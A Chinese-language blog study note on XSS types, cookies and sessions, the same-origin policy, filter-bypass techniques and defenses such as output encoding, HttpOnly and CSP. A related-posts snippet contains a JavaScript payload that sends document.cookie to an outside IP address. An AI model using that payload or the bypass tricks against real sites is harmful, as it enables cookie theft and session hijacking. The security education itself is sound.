XSS和跨域请求

已于 2022-07-22 17:39:06 修改
阅读量1k 收藏
点赞数
分类专栏: XSS 文章标签: http web安全 https
于 2022-06-19 19:57:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48829044/article/details/125361276
版权

XSS和跨域请求

  • 跨站脚本攻击,利用网站漏洞从用户那里恶意盗取信息。
    原理
    1、前端未对输入进行过滤
    2、后台未对接受到的参数过滤
    3、输出过滤

利用条件

  • 网站页面可传入参数,并嵌入其中
  • 该参数用户可控
  • 参数过滤不严格

利用方式

  • 获取用户cookie
  • 记录用户的键盘输入
  • 获取用户浏览器信息
  • 网站挂马,篡改网页内容
  • XSS蠕虫

跨域请求
一个站点中的资源去访问另外一个不同域名站点上的资源。

  • cookie是指:能够让网站服务器把少量文本数据存储到客户端的一种技术。因为http协议是无状态的,web服务器无法区分请求的来源。所以web服务器需要额外的数据用于维护会话。Cookie随http请求、响应一起被传递。服务端通过set-Cookie向客户端发送需要被设置的cookie ,客户端通过Cookie头向服务器传递Cookie。他的主要作用是标识用户、维持会话。

  • session是指:当程序需要为某个客户端的请求创建一个session时,服务器首先检查这个客户端的请求里是否已包含了一个session标识(称为SessionID),如果已包含则说明以前已经为此客户端创建过session,服务器就按照SessionID把这个session检索出来使用;如果客户端请求不包含SessionID,则为此客户端创建一个session并且生成一个与此session相关联的SessionID,这个SessionID将会在本次响应中返回给客户端保存。

  • cookie与session的共性:标识用户、维持会话

  • cookie与session的区别
    (1)cookie是存在客户端的,过去与否可以在cookie生成的时候设置进去,session是放在服务器上的,过期与否取决于服务期的设定。
    (2)cookie不是很安全,别人可以分析存放在本地的COOKIE并进行COOKIE欺骗,如果主要考虑到安全应当使用session
    (3)cookie在客户端的限制是3K
    (4)session保存在服务端会占用性能,如果主要考虑到减轻服务器性能方面,应当使用COOKIE

  • 同源策略
    同源策略限制了不同源之间如何进行资源交互,是用于隔离潜在恶意文件的重要安全机制。 是否同源由URL决定,URL由协议、域名、端口和路径组成,如果两个URL的协议、域名和端口相同,则表示他们同源。此策略可防止某个网页上的恶意脚本通过该页面的文档对象模型(DOM)访问另一网页上的敏感数据。
    (1)file同源:域名或IP地址、子域名、端口、协议
    (2)cookie同源:不管使用哪个协议(HTTP/HTTPS)或端口号,浏览器都允许给定的域以及其任何子域名访问cookie。设置 cookie时,可以使用 domain / path / secure 和 http-only 标记来限定其访问性。
    (3)可跨域的标签:<script> 、<link> 、<img> / <video> / <audio>
    (4)其他跨域方法:JSONP、CORS、window.name、window.postMessage

XSS类型

  • 反射型
    主要用于将恶意脚本附加到请求参数中,只在用户单击url时触发,而且只执行一次,非持久化。常用来窃取客户端cookie或进行钓鱼欺骗,通过引诱用户点击一个恶意连接来实施攻击
  • DOM型
    是一种特殊的反射性XSS,它是基于DOM文档对象模型的一种漏洞,都是非持久型XSS漏洞。不会传递给服务器,所以返回包看不到。俗称的不需要连网。
  • 存储型
    恶意代码被保存到目标网站的服务器中,每次用户访问时都会执行脚本代码,这种攻击具有较强的稳定性和持久性。比反射型跨站脚本更具威胁性,并且可能影响到Web服务器自身的安全。一般出现在网站的留言、评论、日志等交互处。

XSS绕过

  • 闭合标签绕过
    1、 <!-- --!> <!-- -->注释闭合
    2、<textarea>、<title>等RCDATA标签内无法xss需要先使用闭合
    3、value等元素属性闭合

  • 绕过小括号、双引号、单引号
    1、利用反引号‘:<script>alert1'</script>
    2、编码绕过:利用实体编码、unicode编码绕过

  • 混淆绕过
    换行、缺失>闭合的标签、空格、TAB

  • 关键字绕过
    大小写绕过、编码绕过、字符拼接

  • 空格绕过
    利用 / 代替空格、编码绕过(利用实体编码、unicode编码绕过)

  • 利用eval方法绕过

  • 利用控点在标签内部的绕过

XSS防御

  • 对输入和URL参数进行过滤:限制输入数据长度、对输入数据格式进行验证、过滤或删除危险字符

  • 对输出进行编码:php使用htmlspeicalchars()函数,输出实体编码

  • 设置HttpOnly 防止cookie被js盗取:session.cookie_httponly=1

  • 设置CSP:CSP:Content Security Policy(内容安全策略),其旨在减少跨站脚本攻击。由开发者定义一些安全性的策略声明,来指定可信的内容

努力学习的胡豆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS跨域攻击在web项目中的防范,基于antisamy技术
07-10
介绍了XSS跨域攻击在web项目中的防范,基于antisamy技术。
XSS跨域脚本攻击)
m0_52244931的博客
10-23 3629
XSS跨域脚本go攻击
xss发送请求
3569
11-06 669
var img=document.createElement("img"); img.src="http://172.16.5.110:64321/?cao="+escape(document.cookie); document.body.appendChild(img);
XSS跨域攻击讲义
08-19
网络安全 XSS跨域攻击 JS注入 互联网安全
也谈谈同源策略和跨域问题
weixin_30361753的博客
06-03 124
也谈谈同源策略和跨域问题 1 同源策略 所谓同源策略,指的是浏览器对不同源的脚本或者文本的访问方式进行的限制。比如源a的js不能读取或设置引入的源b的元素属性。 那么先定义下什么是同源,所谓同源,就是指两个页面具有相同的协议,主机(也常说域名),端口,三个要素缺一不可。 可以看下面的几个示例来更加清楚的了解一下同源的概念: URL1URL2说...
Web高级知识-跨域&XSS;&CSRF;解决方案
11-26
HTTP的长连接和短连接本质上是TCP长连接和短连接。...IP协议主要解决网络路由和寻址问题,TCP协议主要解决如何在IP层之上可靠的传递数据包,...跨域原因产生:在当前域名请求网站中,默认不允许通过ajax请求发送其他域名。
xss漏洞jar.rar
09-29
攻击者利用跨站请求伪造能够轻松地强迫用户的浏览器发出非故意的HTTP请求,如诈骗性的电汇请求、修改口令和下载非法的内容等请求。 可以通过导入以下两个jar,通过配置实现xss漏洞修复,无需修改代码
关于python 跨域处理方式详解
01-20
浏览器的同源策略(SOP/same origin policy)是浏览器最核心也最基本的安全功能,如果缺少了同源策略,浏览器很容易受到XSS(跨站脚本攻击 cross site scripting)和CSRF(跨站请求伪造cross-site request forgery)...
九种跨域方式实现原理
03-03
前后端数据交互经常会碰到请求跨域,什么是跨域,以及有哪几种跨域方式,这是本文要探讨的内容。同源策略是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,浏览器很容易受到XSS、CSFR等攻击。...
这是一个对文件存储、 JDK8日期,分布式锁、分布式限流、跨域请求,国际化、防XSS攻击、关键字脱敏的增强包,拥有良好的扩展性
最新发布
04-10
这是一个对文件存储、 JDK8日期,分布式锁、分布式限流、跨域请求,国际化、防XSS攻击、关键字脱敏的增强包,拥有良好的扩展性,一切功能都是基于注解化驱动
XSS跨域站点攻击antisamy解决策略文件
10-17
包含常用策略xml文件:antisamy-slashdot-1.4.4.xml、antisamy-ebay-1.4.4.xml、antisamy-anythinggoes-1.4.4.xml、antisamy-tinymce-1.4.4.xml
跨域方法总结
杨森源的博客
12-03 2651
最近面试问的挺多的一个问题,就是JavaScript的跨域问题。在这里,对跨域的一些方法做个总结。由于浏览器的同源策略,不同域名、不同端口、不同协议都会构成跨域;但在实际的业务中,很多场景需要进行跨域传递信息,这样就催生出多种跨域方法。具备src的标签 原理:所有具有src属性的HTML标签都是可以跨域的 在浏览器中,<script>、<img>、<iframe>和<link>这几个标签是可以加载跨
webXSS跨域脚本攻击
m0_45406092的博客
02-25 632
文章目录1. 概念2. Reflected XSS3. Stored XSS4. DOM-XSS5. XSS危害和预防 1. 概念 XSS:全称是跨域脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS攻击分为三种,分别是: Reflected XSS(基于反射的XSS攻击) Stored XSS(基于存储的XSS攻击) DOM-based or local XSS(基于DOM或
web渗透】XSS跨站请求攻击
qinshuoyang1的博客
08-21 1359
反射型xss攻击( Reflected XSS)又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。
跨域攻击XSS防御
无界编程
09-26 4953
Java的view层可以使用EL和JSTL后端的ModelAndView增加mv.addObject("xss", "alert(\"test\")");View页面${xss}  c:out 有个缺省属性escapeXML="true" 将会对特色字符如 ‘‘ ‘&‘ 等进行转义,而EL表达式则不会。
一个跨域请求XSS
mengxiankon的博客
05-09 626
之前讨论过,在解决post跨域请求时,采用iframe+本域代理页的形式,兼容性(当然是包括IE6啦)是最好的。上次提到,代理页面的作用是:执行本域下的回调函数。就是这个原因,给XSS带来了便利。详细说明,请参考一个跨域请求XSS漏洞     上次也提到,解决这个问题的根本在于杜绝不合法的函数在页面内执行。上次透了一下懒,对函数名就行了包含匹配。过程如下:
前端安全性问题——XSS跨域脚本攻击
godming的博客
12-06 535
XSS跨域脚本攻击 安全圈内有一句非常有名的话:所有的输入都是有害的!这句话把XSS漏洞的本质体现的淋漓尽致。 原理 无需登录认证,核心原理就是向你的页面注入脚本。 反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。 存储型:存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务端...
跨域、sql注入、xss攻击
遨游大海
11-14 811
原文地址:http://www.cnblogs.com/webclz/p/4159577.html 这几天遇到这三个问题,现在简单的记录下来。 1、跨域     如我服务器的域名是www.test1.com,我在另一个服务器www.test2.com通过ajax访问www.test1.com的数据时,就引起跨域的问题,提示错误 No 'Access-Control-A
1.7 xss之同源策略与跨域访问
weixin_30922589的博客
08-19 184
同源策略: 同源策略 在web应用的安全模型中是一个重要概念。在这个策略下,web浏览器允许第一个页面的脚本访问第二个页面里的数据,但是也只有在两个页面有相同的源时。源是由URI,主机名,端口号组合而成的。这个策略可以阻止一个页面上的恶意脚本通过页面的DOM对象获得访问另一个页面上敏感信息的权限。 对于普遍依赖于cookie维护授权用户session的现代浏览器来说,这种机制...
csr防止跨域请求跨域攻击
08-14
CSR(Cross-Site Request)是一种安全机制,旨在防止跨域请求跨域攻击。 跨域请求是指Web应用程序在一个域名下发送HTTP请求,但目标资源位于另一个不同的域名下。这种请求通常是由于前端页面中的JavaScript代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值